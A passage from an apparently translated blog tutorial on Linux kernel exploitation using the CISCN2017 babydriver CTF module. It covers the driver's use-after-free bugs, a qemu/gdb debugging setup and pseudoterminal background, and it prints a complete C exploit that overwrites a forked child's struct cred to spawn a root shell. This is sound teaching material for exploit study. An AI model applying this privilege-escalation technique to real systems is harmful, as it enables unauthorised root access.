length);</span><br><span class="line">    result = length;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> result;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h5 id="7-babyioctl">7) babyioctl</h5><p>babyioctl behaves much like <code>realloc</code>: it frees the existing device_buf and allocates a new block of memory.</p><p>There is one important point to note here: <strong>the size passed to kmalloc at this location is fully controlled by the user</strong>, instead of being the fixed 64 used in babyopen.</p><p><img src="/2021/10/kernel_pwn_introduction/image-20211004203631020.png" alt="image-20211004203631020"></p><h4 id="e-获取到的信息">e. Information gathered</h4><p>Based on the analysis above, we end up with the following information:</p><p>Protections enabled:</p><ul><li><p>nx</p></li><li><p>smep</p></li></ul><p>Potentially exploitable points in the kernel module:</p><ul><li>babyrelease <strong>does not set the device_buf pointer to NULL after freeing it, and does not reset device_buf_len to 0</strong></li><li>babyioctl lets device_buf be reallocated with an <strong>arbitrary size</strong></li><li><strong>Every variable used by the module is global</strong>, which means the module is <strong>very fragile under concurrent access</strong>; this may be exploitable.</li></ul><h3 id="4-调试前的准备">4. Preparing for debugging</h3><ul><li><p>Write the following shell script to launch a debugging session quickly</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span 
class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#!/bin/bash</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># Check that we are running as root; gef-remote --qemu-mode needs elevated privileges</span></span><br><span class="line">user=$(<span class="built_in">env</span> | grep <span class="string">&quot;^USER&quot;</span> | <span class="built_in">cut</span> -d <span class="string">&quot;=&quot;</span> -f 2)</span><br><span class="line"><span class="keyword">if</span> [ <span class="string">&quot;<span class="variable">$user</span>&quot;</span> != <span class="string">&quot;root&quot;</span>  ]</span><br><span class="line">  <span class="keyword">then</span></span><br><span class="line">    <span class="built_in">echo</span> <span class="string">&quot;Please run this script as root&quot;</span></span><br><span class="line">    <span class="built_in">exit</span> 1</span><br><span class="line"><span class="keyword">fi</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># Build the exploit as a static binary</span></span><br><span class="line">gcc exp.c -static -o rootfs/exp</span><br><span class="line"></span><br><span class="line"><span class="comment"># Pack the rootfs</span></span><br><span class="line"><span class="built_in">pushd</span> rootfs</span><br><span class="line">find . 
| cpio -o --format=newc &gt; ../rootfs.cpio</span><br><span class="line"><span class="built_in">popd</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># Start gdb</span></span><br><span class="line">gnome-terminal -e <span class="string">&#x27;gdb -x mygdbinit&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># Start qemu</span></span><br><span class="line">qemu-system-x86_64 \</span><br><span class="line">    -initrd rootfs.cpio \</span><br><span class="line">    -kernel bzImage \</span><br><span class="line">    -append <span class="string">&#x27;console=ttyS0 root=/dev/ram oops=panic panic=1&#x27;</span> \</span><br><span class="line">    -enable-kvm \</span><br><span class="line">    -monitor /dev/null \</span><br><span class="line">    -m 64M \</span><br><span class="line">    --nographic  \</span><br><span class="line">    -smp cores=1,threads=1 \</span><br><span class="line">    -cpu kvm64,+smep \</span><br><span class="line">    -s</span><br></pre></td></tr></table></figure><blockquote><p>The exploit must be statically linked: the kernel does not provide a C standard library for user space (and the rootfs may not ship one), but the syscall interface is always available.</p></blockquote></li><li><p>Obtain vmlinux</p><p>We can use the <a href="https://github.com/torvalds/linux/blob/master/scripts/extract-vmlinux">extract-vmlinux</a> script to extract vmlinux from bzImage.</p><blockquote><p>If gdb loads bzImage directly, it cannot read any kernel symbols,</p><p>so vmlinux has to be extracted from bzImage first and then loaded into gdb for symbols.</p></blockquote><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">wget https://raw.githubusercontent.com/torvalds/linux/master/scripts/extract-vmlinux</span><br><span class="line"><span class="built_in">chmod</span> +x ./extract-vmlinux</span><br><span class="line"><span class="built_in">cd</span> CISCN2017-babydriver/babydriver/</span><br><span class="line">../../extract-vmlinux 
bzImage &gt; vmlinux</span><br></pre></td></tr></table></figure><p>In practice, however, every function in the extracted vmlinux is named <code>sub_xxxx</code>, which makes debugging inconvenient. Although all kernel symbol and function name information is available in the kernel symbol table (or in <code>/proc/kallsyms</code>), matching the names up one by one is tedious.</p><p>There is therefore another tool worth using: <code>vmlinux-to-elf</code></p><blockquote><p>A Python version <strong>newer than 3.5</strong> must be installed before using this tool</p></blockquote><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> apt install python3-pip</span><br><span class="line"><span class="built_in">sudo</span> pip3 install --upgrade lz4 git+https://github.com/marin-m/vmlinux-to-elf</span><br></pre></td></tr></table></figure><p>Usage:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># vmlinux-to-elf &lt;input_kernel.bin&gt; &lt;output_kernel.elf&gt;</span></span><br><span class="line">vmlinux-to-elf bzImage vmlinux</span><br></pre></td></tr></table></figure><p>The vmlinux produced this way carries symbols, so gdb can load it and set breakpoints normally.</p></li><li><p>Check which kernel version the bzImage corresponds to, and download the source for that version (only needed if you want to study the kernel in more detail)</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">$ strings bzImage | grep <span class="string">&quot;gcc&quot;</span> <span class="comment"># or use the `file bzImage` command</span></span><br><span class="line">4.4.72 (atum@ubuntu) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) <span class="comment">#1 SMP Thu Jun 15 19:52:50 PDT 2017</span></span><br><span class="line"></span><br><span class="line">$ curl -O -L 
https://mirrors.tuna.tsinghua.edu.cn/kernel/v4.x/linux-4.4.72.tar.xz</span><br><span class="line">$ unxz linux-4.4.72.tar.xz</span><br><span class="line">$ tar -xf linux-4.4.72.tar</span><br></pre></td></tr></table></figure></li><li><p>After the kernel has booted, remember to load the symbols of the ko in gdb with <code>add-symbol-file</code>:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># in kernel shell:</span></span><br><span class="line">/ $ lsmod</span><br><span class="line">babydriver 16384 0 - Live 0xffffffffc0000000 (OE)</span><br><span class="line"></span><br><span class="line"><span class="comment"># in gdb:</span></span><br><span class="line">gef➤  add-symbol-file babydriver.ko 0xffffffffc0000000</span><br></pre></td></tr></table></figure></li><li><p>The final mygdbinit looks like this</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">set architecture i386:x86-64</span><br><span class="line">add-symbol-file vmlinux</span><br><span class="line">gef-remote --qemu-mode localhost:1234</span><br><span class="line"></span><br><span class="line">c</span><br><span class="line"><span class="meta prompt_"></span></span><br><span class="line"><span class="meta prompt_"># </span><span 
class="language-bash"><span class="built_in">continue</span> first, then press Ctrl+C manually after insmod and set the breakpoints, so that they do not stay pending</span></span><br><span class="line">add-symbol-file babydriver.ko 0xffffffffc0000000</span><br><span class="line"></span><br><span class="line">b babyread</span><br><span class="line">b babywrite</span><br><span class="line">b babyioctl</span><br><span class="line">b babyopen</span><br><span class="line">b babyrelease</span><br><span class="line"></span><br><span class="line">c</span><br></pre></td></tr></table></figure></li></ul><h3 id="5-kernel-的-UAF-利用">5. Exploiting the UAF in the kernel</h3><h4 id="a-覆写-cred-结构体">a. Overwriting the cred structure</h4><p>The usual way to exploit a UAF is to use the dangling pointer to modify data in a particular chunk of memory, so here we can try the following:</p><ul><li>First, obtain a dangling pointer to a chunk of memory that has already been freed</li><li>Call fork, so that the <code>struct cred</code> allocated for the new child process reuses that chunk</li><li>Use the dangling pointer to modify the <code>struct cred</code> in that chunk at will, achieving privilege escalation</li></ul><p><code>struct cred</code> <strong>stores the privileges of each process</strong>; it is defined as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span 
class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * The security context of a task</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * The parts of the context break down into two categories:</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> *  (1) The objective context of a task.  These parts are used when some other</span></span><br><span class="line"><span class="comment"> *  task is attempting to affect this one.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> *  (2) The subjective context.  
These details are used when the task is acting</span></span><br><span class="line"><span class="comment"> *  upon another object, be that a file, a task, a key or whatever.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * Note that some members of this structure belong to both categories - the</span></span><br><span class="line"><span class="comment"> * LSM security pointer for instance.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * A task has two security pointers.  task-&gt;real_cred points to the objective</span></span><br><span class="line"><span class="comment"> * context that defines that task&#x27;s actual details.  The objective part of this</span></span><br><span class="line"><span class="comment"> * context is used whenever that task is acted upon.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * task-&gt;cred points to the subjective context that defines the details of how</span></span><br><span class="line"><span class="comment"> * that task is going to act upon another object.  
This may be overridden</span></span><br><span class="line"><span class="comment"> * temporarily to point to another security context, but normally points to the</span></span><br><span class="line"><span class="comment"> * same context as task-&gt;real_cred.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">cred</span> &#123;</span><br><span class="line">  <span class="type">atomic_t</span>  usage;</span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> CONFIG_DEBUG_CREDENTIALS</span></span><br><span class="line">  <span class="type">atomic_t</span>  subscribers;  <span class="comment">/* number of processes subscribed */</span></span><br><span class="line">  <span class="type">void</span>    *put_addr;</span><br><span class="line">  <span class="type">unsigned</span>  magic;</span><br><span class="line"><span class="meta">#<span class="keyword">define</span> CRED_MAGIC  0x43736564</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> CRED_MAGIC_DEAD  0x44656144</span></span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">  <span class="type">kuid_t</span>    uid;    <span class="comment">/* real UID of the task */</span></span><br><span class="line">  <span class="type">kgid_t</span>    gid;    <span class="comment">/* real GID of the task */</span></span><br><span class="line">  <span class="type">kuid_t</span>    suid;    <span class="comment">/* saved UID of the task */</span></span><br><span class="line">  <span class="type">kgid_t</span>    sgid;    <span class="comment">/* saved GID of the task */</span></span><br><span class="line">  <span class="type">kuid_t</span>    euid;    <span class="comment">/* effective UID of the task */</span></span><br><span class="line">  <span class="type">kgid_t</span>    egid;    <span 
class="comment">/* effective GID of the task */</span></span><br><span class="line">  <span class="type">kuid_t</span>    fsuid;    <span class="comment">/* UID for VFS ops */</span></span><br><span class="line">  <span class="type">kgid_t</span>    fsgid;    <span class="comment">/* GID for VFS ops */</span></span><br><span class="line">  <span class="type">unsigned</span>  securebits;  <span class="comment">/* SUID-less security management */</span></span><br><span class="line">  <span class="type">kernel_cap_t</span>  cap_inheritable; <span class="comment">/* caps our children can inherit */</span></span><br><span class="line">  <span class="type">kernel_cap_t</span>  cap_permitted;  <span class="comment">/* caps we&#x27;re permitted */</span></span><br><span class="line">  <span class="type">kernel_cap_t</span>  cap_effective;  <span class="comment">/* caps we can actually use */</span></span><br><span class="line">  <span class="type">kernel_cap_t</span>  cap_bset;  <span class="comment">/* capability bounding set */</span></span><br><span class="line">  <span class="type">kernel_cap_t</span>  cap_ambient;  <span class="comment">/* Ambient capability set */</span></span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> CONFIG_KEYS</span></span><br><span class="line">  <span class="type">unsigned</span> <span class="type">char</span>  jit_keyring;  <span class="comment">/* default keyring to attach requested</span></span><br><span class="line"><span class="comment">           * keys to */</span></span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">key</span> __rcu *session_keyring; <span class="comment">/* keyring inherited over fork */</span></span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">key</span>  *process_keyring; <span class="comment">/* keyring private to this process */</span></span><br><span class="line">  <span 
class="keyword">struct</span> <span class="title class_">key</span>  *thread_keyring; <span class="comment">/* keyring private to this thread */</span></span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">key</span>  *request_key_auth; <span class="comment">/* assumed request_key authority */</span></span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> CONFIG_SECURITY</span></span><br><span class="line">  <span class="type">void</span>    *security;  <span class="comment">/* subjective LSM security */</span></span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">user_struct</span> *user;  <span class="comment">/* real user ID subscription */</span></span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">user_namespace</span> *user_ns; <span class="comment">/* user_ns the caps and keyrings are relative to. 
*/</span></span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">group_info</span> *group_info;  <span class="comment">/* supplementary groups for euid/fsgid */</span></span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">rcu_head</span>  rcu;    <span class="comment">/* RCU deletion hook */</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>The code that allocates the <code>struct cred</code> of a new process sits in the <code>_do_fork -&gt; copy_process -&gt; copy_creds -&gt; prepare_creds</code> call chain.</p><p>To avoid tedious heap manipulation and keep the exploit simple, we only need the <code>device_buf</code> memory freed by babydriver to have the same size as <code>sizeof(struct cred)</code>. That way, when the kernel allocates memory for a struct cred, it can be handed the device_buf memory that was freed moments earlier.</p><p>The vmlinux extracted from the current bzImage has no <strong>struct</strong> symbols, so we can build a fresh vmlinux with the default configuration and load it to read the size of <code>struct cred</code>:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">gef➤  p sizeof(struct cred)</span><br><span class="line"><span class="variable">$1</span> = 0xa8</span><br></pre></td></tr></table></figure><p>Once <code>babyrelease</code> has run, <code>device_buf</code> becomes a dangling pointer. Note, however, that after a user-space process calls <code>close(fd)</code> it can no longer use that file descriptor, so there is no way to write through this fd after the <code>close</code>.</p><p>We can, however, rely on the fact that babydriver keeps <strong>all of its variables global</strong>: call open twice and obtain two fds. Even after one fd has been closed, the other one can still be used to write to <code>device_buf</code>.</p><p>This gives us a complete exploitation flow. The exploit is shown below:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span 
class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;fcntl.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/ioctl.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/wait.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="type">int</span> fd1 = <span class="built_in">open</span>(<span 
class="string">&quot;/dev/babydev&quot;</span>, O_RDWR); <span class="comment">// alloc</span></span><br><span class="line">    <span class="type">int</span> fd2 = <span class="built_in">open</span>(<span class="string">&quot;/dev/babydev&quot;</span>, O_RDWR); <span class="comment">// alloc</span></span><br><span class="line">    <span class="built_in">ioctl</span>(fd1, <span class="number">65537</span>, <span class="number">0xa8</span>);    <span class="comment">// realloc</span></span><br><span class="line">    <span class="built_in">close</span>(fd1); <span class="comment">// free</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (!fork()) &#123;</span><br><span class="line">        <span class="comment">// child</span></span><br><span class="line"></span><br><span class="line">        <span class="comment">// try to overwrite struct cred</span></span><br><span class="line">        <span class="type">char</span> mem[<span class="number">4</span> * <span class="number">7</span>]; <span class="comment">// usage uid gid suid sgid euid egid</span></span><br><span class="line">        <span class="built_in">memset</span>(mem, <span class="string">&#x27;\x00&#x27;</span>, <span class="built_in">sizeof</span>(mem));</span><br><span class="line">        <span class="built_in">write</span>(fd2, mem, <span class="built_in">sizeof</span>(mem));</span><br><span class="line"></span><br><span class="line">        <span class="comment">// get shell</span></span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;[+] after LPE, privilege: %s\n&quot;</span>, (<span class="built_in">getuid</span>() ? 
<span class="string">&quot;user&quot;</span> : <span class="string">&quot;root&quot;</span>));</span><br><span class="line">        <span class="built_in">system</span>(<span class="string">&quot;/bin/sh&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">        <span class="comment">// parent</span></span><br><span class="line">        <span class="built_in">waitpid</span>(<span class="number">-1</span>, <span class="literal">NULL</span>, <span class="number">0</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><blockquote><p>Note that after the fork, the parent process must wait for the child. Otherwise, once the parent is destroyed, the child becomes an orphan process and can no longer use the terminal for input and output.</p></blockquote><p>Result of the exploit:</p><p><img src="/2021/10/kernel_pwn_introduction/image-20211007082752272.png" alt="image-20211007082752272"></p><h4 id="b-Kernel-ROP">b. 
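Kernel ROP</h4><h5 id="1-终端设备类型简介">1) Overview of terminal device types</h5><p>Under the <code>/dev</code> directory on Linux, terminal device files usually come in the following kinds:</p><blockquote><p>Note: these terminal types do not necessarily exist on every Linux distribution. For example, <code>/dev/ttyprintk</code> does not exist on my Kali Linux.</p></blockquote><ol><li><p>Serial port terminals (<strong>/dev/ttySn</strong>): terminal devices connected through a serial port, similar to COM on Windows.</p></li><li><p>Controlling terminal (<strong>/dev/tty</strong>): the device file for the controlling terminal of the <strong>current process</strong>. It behaves much like a symbolic link and resolves to some actual terminal file.</p><blockquote><p>Use the <code>tty</code> command to see which terminal device it resolves to, or use <code>ps -ax</code> to see the mapping between processes and controlling terminals.</p></blockquote><p><img src="/2021/10/kernel_pwn_introduction/image-20211007225628587.png" alt="image-20211007225628587"></p><blockquote><p>Under qemu, passing the <code>-append 'console=ttyS0'</code> argument maps the Linux kernel tty onto <code>/dev/ttySn</code>.</p></blockquote><p><img src="/2021/10/kernel_pwn_introduction/image-20211007230821016.png" alt="image-20211007230821016"></p></li><li><p>Virtual terminals and the console (<strong>/dev/ttyN, /dev/console</strong>): on Linux, the computer's display is usually called the <strong>console terminal</strong> (Console). In the Linux <strong>initial text-mode interface</strong>, handling several tasks at once naturally requires switching between multiple terminals. Because these terminals are emulated in software in place of the hardware terminals of the past, they are also called <strong>virtual terminals</strong>.</p><blockquote><p>The difference between a virtual terminal and the console is historical. Terminals used to be attached over a serial port and were not part of the computer itself, whereas the console was a device built into the computer, and each computer had exactly one console.</p><p>In short, <strong>the console is the native device attached directly to the computer, while a terminal is a device connected to the host through a cable, a network, and so on</strong>.</p><p>When the computer boots, all messages are shown on the console and not on a terminal. In other words, the console is a basic device of the computer, and a terminal is an add-on device.</p><p>Because the console offers the same functionality as a terminal, it is sometimes loosely referred to as a terminal too.</p><p>Within the operating system, messages that are not tied to a terminal, such as kernel messages and background service messages, can be shown on the console but are not shown on a terminal.</p><p>As hardware resources have become plentiful over time, the distinction between terminal and console has gradually faded.</p></blockquote><p>Switching between virtual terminals differs from switching between terminal windows in an X11 graphical interface: it is a switch <strong>at a higher level</strong>. The terminals we use every day in a graphical environment are multiple <strong>pseudoterminals</strong> that live inside a single <strong>virtual graphical terminal</strong>.</p><p>Press <code>Ctrl+Alt+F1</code> to switch virtual terminals (F<strong>x</strong> switches to the <strong>x</strong>-th terminal, for example F1).</p><blockquote><p>tty0 is an alias for the virtual terminal currently in use, and messages generated by the system are sent to it.</p></blockquote><p>By default, F1-F6 are text terminals and F7-F12 are graphical terminals.</p><blockquote><p>After switching to a text terminal, press <code>Ctrl+Alt+F7</code> to switch back to the graphical terminal.</p></blockquote><p><img 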
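src="/2021/10/kernel_pwn_introduction/image-20211007231737902.png" alt="image-20211007231737902"></p></li><li><p>Pseudoterminals (<strong>/dev/pty</strong>): a <strong>pseudoterminal (Pseudo Terminal)</strong> is a pair of <strong>logical</strong> terminal devices that behave very much like an ordinary terminal. The difference is that a pseudoterminal has no hardware device behind it. Its main purpose is to implement a bidirectional channel that gives other programs a terminal-style interface.</p><p>When we connect to a host remotely, the terminal we interact with is a pseudoterminal, and the terminal windows used every day in a graphical environment are all pseudoterminals as well.</p><p>The two devices of a pseudoterminal are called the master device and the slave device. The slave device behaves exactly like an ordinary terminal.</p><p>When a program treats a master device as a terminal and reads from or writes to it, those operations are actually reflected on the slave device paired with it. The slave device is usually read and written by another program, so the two programs can communicate through this pair of logical terminals.</p><p>Modern Linux mainly uses the <strong>UNIX 98 pseudoterminals</strong> standard, in which <strong>pts (pseudo-terminal slave, /dev/pts/n)</strong> and <strong>ptmx (pseudo-terminal master, /dev/ptmx)</strong> work together to implement a pty.</p><p>How to use pseudoterminals is covered in detail below.</p></li><li><p>Other terminals (such as <strong>/dev/ttyprintk</strong>). These usually serve a special purpose. For example, <strong>/dev/ttyprintk</strong> is connected directly to the kernel buffer:</p><p><img src="/2021/10/kernel_pwn_introduction/image-20211007233344098.png" alt="image-20211007233344098"></p></li></ol><h5 id="2-伪终端的使用">2) Using pseudoterminals</h5><p>There are two concrete pseudoterminal implementations:</p><ul><li>UNIX 98 pseudoterminals, which involve <code>/dev/ptmx</code> (master) and <code>/dev/pts/*</code> (slave)</li><li>Legacy BSD pseudoterminals, which involve <code>/dev/pty[p-za-e][0-9a-f]</code> (master) and <code>/dev/tty[p-za-e][0-9a-f]</code> (slave)</li></ul><p>Only UNIX 98 pseudoterminals are covered here.</p><p>The <code>/dev/ptmx</code> device file is used to open a pair of pseudoterminal devices. When a process opens <code>/dev/ptmx</code>, it receives a file descriptor that refers to a <strong>new pseudoterminal master device (PTM)</strong>, and the matching <strong>new pseudoterminal slave device (PTS)</strong> is created under <code>/dev/pts/</code>. The PTM and PTS obtained by different processes that open <code>/dev/ptmx</code> are all distinct from one another.</p><p>A process can open /dev/ptmx in three ways:</p><ol><li><p>Open it manually with <code>open(&quot;/dev/ptmx&quot;, O_RDWR | O_NOCTTY)</code></p></li><li><p>Call the standard library function <code>getpt</code></p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span 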
class="keyword">define</span> _GNU_SOURCE             <span class="comment">/* See feature_test_macros(7) */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">getpt</span><span class="params">(<span class="type">void</span>)</span></span>;</span><br></pre></td></tr></table></figure></li><li><p>Call the standard library function <code>posix_openpt</code></p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;fcntl.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">posix_openpt</span><span class="params">(<span class="type">int</span> flags)</span></span>;</span><br></pre></td></tr></table></figure></li></ol><blockquote><p>The approaches above are fully equivalent. <strong>Using the standard library functions</strong> is simply a bit more portable, because on some Linux distributions ptmx may not be located at <code>/dev/ptmx</code>, and the library functions also perform some additional checks.</p></blockquote><p>A process can call <code>ptsname(ptm_fd)</code> to get the path of the corresponding PTS.</p><p>Note that the following two functions must be called, in this order, before the PTS can be opened:</p><ol><li><code>grantpt(ptm_fd)</code>: changes the mode and owner of the slave so that the caller takes ownership of it</li><li><code>unlockpt(ptm_fd)</code>: unlocks the slave</li></ol><p>Pseudoterminals are mainly used in two scenarios:</p><ul><li>Terminal emulation, providing terminal functionality for remote login programs (such as ssh)</li><li>Sending input to programs that <strong>normally refuse to read input from a pipe</strong> (such as su and passwd)</li></ul><p>The steps above are the low-level functions that any use of a pseudoterminal has to call. In real pseudoterminal programming, however, the following functions are used more often:</p><blockquote><p>Reading the source code of these functions is a good way to learn how pseudoterminals are used.</p></blockquote><ul><li><p><code>openpty</code>: finds a free pseudoterminal and returns the file descriptors of the opened master and
slave terminals. The source code is as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span 